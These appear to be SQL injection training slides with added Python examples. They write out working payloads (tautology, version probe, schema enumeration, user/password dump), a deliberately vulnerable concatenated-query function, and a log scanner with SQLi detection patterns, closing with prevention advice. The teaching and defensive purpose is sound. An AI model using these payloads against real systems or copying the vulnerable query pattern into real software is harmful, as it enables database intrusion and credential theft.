SQL Injection
3rd July, 2024 via MS Teams

SQL Injection
A vulnerability that consists of an attacker interfering with the SQL queries
that an application makes to its database.

SQLi (Structured Query Language injection) is an attack in which DBMS
commands are injected through a website's inputs to manipulate the backend
database.

This is usually possible because metacharacters (i.e., symbols with
programmatic power, such as the single quote) are not properly filtered or
escaped (i.e., reverted to plain symbols with no programmatic power) before
being placed into a query.
SQL Statements
The following is a partial table of common SQL commands and clauses used in SQLi
statements:

SQL Expression   Description
ORDER BY         Sort data in ascending or descending order.
UNION            Combine the results of two or more SELECT statements (each must return the same number of columns).
SELECT           Retrieve certain records from one or more tables.
UPDATE           Modify records.
INSERT           Create a record.
DELETE           Delete a record.
DROP             Delete an entire table, a view of a table, or other objects in the database.
SQL Tips
In SQLi, the most important character is the single quote: it closes the string literal the
application opened, so whatever follows it is parsed as SQL rather than as data.

If we want to return DBMS details, we use the statement ' UNION SELECT @@version, NULL#
(MySQL syntax: @@version holds the server version, NULL pads the second column so that the
UNION matches the two columns of the original SELECT, and # comments out the rest of the
original query, including its closing quote).

To test whether you can exploit the server script through Boolean logic, type the following
into the User ID: field and then select Submit:
1' or '1'='1

This is a typical initial SQLi method that uses logic to trick the target into revealing more
information than its programmers intended. The concept is that you are setting up an OR
expression between a variable condition (i.e., whether a User ID exists) and a tautology
(i.e., a statement that is always true, e.g. 1=1). The WHERE clause therefore evaluates to
true for every row regardless of whether the variable condition is true, so instead of
returning the single entry the programmers intended, the script may return all entries.
SQL Tips
Type the following command into the User ID: field, then select Submit:

' UNION SELECT table_schema, table_name FROM information_schema.tables#

This SQLi expression requests two columns of data (i.e., table_schema, table_name) from
the default metadata database of MySQL (i.e., information_schema.tables, which lists every
table the current database user can see). The table_schema value will be the name of the
database (displayed on the First name: lines), and the table_name will be the name of a table
within that database (displayed on the Surname: lines).
SQL Tips
You now need to discover the column names of the tables.
However, the fastest way to do that results in all columns from all tables being dumped at
once (appending WHERE table_name = 'users' before the # would narrow it to one table).
Type the following command into the User ID: field, then select Submit:

' UNION SELECT table_name, column_name FROM information_schema.columns#

This SQLi expression requests two columns of data (i.e., table_name, column_name) from the
default metadata table of MySQL (i.e., information_schema.columns). The table_name value will
be the table's name (displayed on the First name: lines), and the column_name will be the name
of a column within that table (displayed on the Surname: lines).
SQL Tips
With knowledge of the available columns in a table, you can now attempt to retrieve the
data from those columns.
So, you decide to pull usernames and passwords from the users table. Type the following
command into the User ID: field, then select Submit:

' UNION SELECT user, password FROM users#
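The following is an added example, not part of the original slides, that replays the User ID payloads from the previous pages (the tautology, the version probe, the information_schema enumeration and the final dump) against a deliberately vulnerable query that concatenates the input exactly as the lab script does. The slides target MySQL; this example assumes SQLite so it runs offline, which means the MySQL-specific pieces are swapped for their SQLite equivalents (noted in the comments), and the user rows are constructed sample data.

```python
import sqlite3

# Constructed lab data standing in for the page's "users" table. The slides target
# MySQL; SQLite is used here (assumption) so the example runs offline, which means
# the MySQL-specific pieces are swapped for their SQLite equivalents:
#   @@version            -> sqlite_version()
#   information_schema   -> sqlite_master / pragma_table_info()  (SQLite >= 3.16)
#   # line comment       -> -- line comment
SEED = """
CREATE TABLE users (
    user_id    INTEGER PRIMARY KEY,
    first_name TEXT, last_name TEXT, user TEXT, password TEXT);
INSERT INTO users VALUES (1, 'admin',  'admin', 'admin',   'P@ssw0rd');
INSERT INTO users VALUES (2, 'Gordon', 'Brown', 'gordonb', 'summer2024');
INSERT INTO users VALUES (3, 'Hack',   'Me',    '1337',    'letmein');
"""


def connect():
    """Fresh in-memory database loaded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SEED)
    return conn


def lookup_user_vulnerable(conn, user_id):
    """Deliberately vulnerable: mirrors the lab's
    SELECT first_name, last_name FROM users WHERE user_id = '$id'
    by concatenating the User ID straight into the query text."""
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(sql).fetchall()


# The slides' payloads, with the MySQL # terminator translated to SQLite's --.
# Every UNION returns exactly two columns to match the original SELECT.
PAYLOADS = {
    "intended":  "1",
    "tautology": "1' or '1'='1",
    "version":   "' UNION SELECT sqlite_version(), NULL--",
    "tables":    "' UNION SELECT type, name FROM sqlite_master--",
    "columns":   "' UNION SELECT name, type FROM pragma_table_info('users')--",
    "dump":      "' UNION SELECT user, password FROM users--",
}


def run_payloads():
    """Run every payload against the vulnerable function; returns {label: rows}."""
    conn = connect()
    try:
        return {label: lookup_user_vulnerable(conn, p) for label, p in PAYLOADS.items()}
    finally:
        conn.close()


if __name__ == "__main__":
    for label, rows in run_payloads().items():
        print(f"{label:>10}: {rows}")
```

Running it shows the progression the slides describe: the intended input returns one row, the tautology returns every row, and each UNION payload rides on the two-column shape of the original SELECT to pull metadata and finally the credentials out through the First name/Surname display fields.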


SQL Tips
Web servers record request URLs percent-encoded, so you may need to consult a reference table
to recover the characters an attacker actually sent. Some recognition of percent encoding is
therefore necessary in order to interpret website log entries. Here is a partial reference
table of commonly used percent encodings related to SQLi:

Encoding  Value
%20       (space)
%21       !
%22       "
%23       #
%27       '
%28       (
%29       )
%2b       +
%2c       ,
%2f       /
%3a       :
%3c       <
%3d       =
%3e       >
%3f       ?
%40       @
%5C       \

When dealing with hex values, such as those used in percent encoding, the case of the hex
letters is irrelevant: %2b and %2B both decode to +.
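The following is an added example, not from the original slides, showing how a reviewer would apply the table above programmatically: it percent-decodes the query string of access-log request lines and flags the SQLi indicators discussed on the previous pages (single quote, comment terminator, UNION SELECT, OR tautology). The log lines and the /app/user.php path are constructed for the example, not real traffic; the decoding relies on Python's standard library, which handles upper- and lowercase hex identically.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines in Apache common log format (not real traffic).
# Note the mixed-case hex (%2C vs %2c) and the '+' form-encoding of spaces.
SAMPLE_LOG = """\
10.0.0.5 - - [03/Jul/2024:10:15:01 +0000] "GET /app/user.php?id=1&Submit=Submit HTTP/1.1" 200 4412
10.0.0.7 - - [03/Jul/2024:10:15:09 +0000] "GET /app/user.php?id=1%27+or+%271%27%3D%271&Submit=Submit HTTP/1.1" 200 5138
10.0.0.7 - - [03/Jul/2024:10:15:42 +0000] "GET /app/user.php?id=%27+UNION+SELECT+table_schema%2C+table_name+FROM+information_schema.tables%23&Submit=Submit HTTP/1.1" 200 9920
10.0.0.7 - - [03/Jul/2024:10:16:03 +0000] "GET /app/user.php?id=%27+union+select+user%2c+password+from+users%23&Submit=Submit HTTP/1.1" 200 6001
"""

# Pull the request target out of the quoted request line.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Indicators from the slides, matched against the *decoded* parameter value.
INDICATORS = [
    ("single quote", re.compile(r"'")),
    ("comment terminator", re.compile(r"(#|--|/\*)")),
    ("union select", re.compile(r"\bunion\b.*\bselect\b", re.IGNORECASE)),
    ("tautology", re.compile(r"\bor\b\s*'?\w+'?\s*=\s*'?\w+'?", re.IGNORECASE)),
]


def decode_params(request_target):
    """Return [(name, value), ...] with percent-encoding undone.

    parse_qsl applies form-encoding rules: '+' becomes a space and %2B (any hex
    case) becomes a literal '+', which is what the browser sent in the first place.
    """
    return parse_qsl(urlsplit(request_target).query, keep_blank_values=True)


def scan_log(text):
    """Return [(param, decoded_value, [indicator, ...])] for every suspicious parameter."""
    findings = []
    for line in text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        for name, value in decode_params(match.group(1)):
            hits = [label for label, rx in INDICATORS if rx.search(value)]
            if hits:
                findings.append((name, value, hits))
    return findings


if __name__ == "__main__":
    for param, value, hits in scan_log(SAMPLE_LOG):
        print(f"{param}={value!r}  <- {', '.join(hits)}")
```

Treat the indicators as triage signals rather than proof: a surname such as O'Brien will trip the single-quote check on its own, so in practice the decoded value is what an analyst reads, and the combination of quote, UNION and comment terminator is what makes a line worth escalating.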
Preventing SQL Injection Attacks
Option 1: Use of Prepared Statements
The construction of the SQL statement is performed in two steps:
• The application specifies the query's structure with placeholders for each user
  input
• The application supplies the content of each placeholder, which the driver binds as
  data and never parses as SQL

Option 2: Use of Stored Procedures
• A stored procedure is a batch of statements grouped together and stored in the
  database
• Not always safe from SQL injection: a procedure that builds dynamic SQL internally is
  still injectable, and it must still be called in a parameterized way

Option 3: Whitelist Input Validation
• Defining what values are authorized; everything else is rejected
• Useful for values that cannot be specified as parameter placeholders, such as a
  table or column name in an ORDER BY

Option 4: Escaping All User Supplied Input
• Should only be used as a last resort, because escaping rules are DBMS-specific and a
  single missed context reopens the hole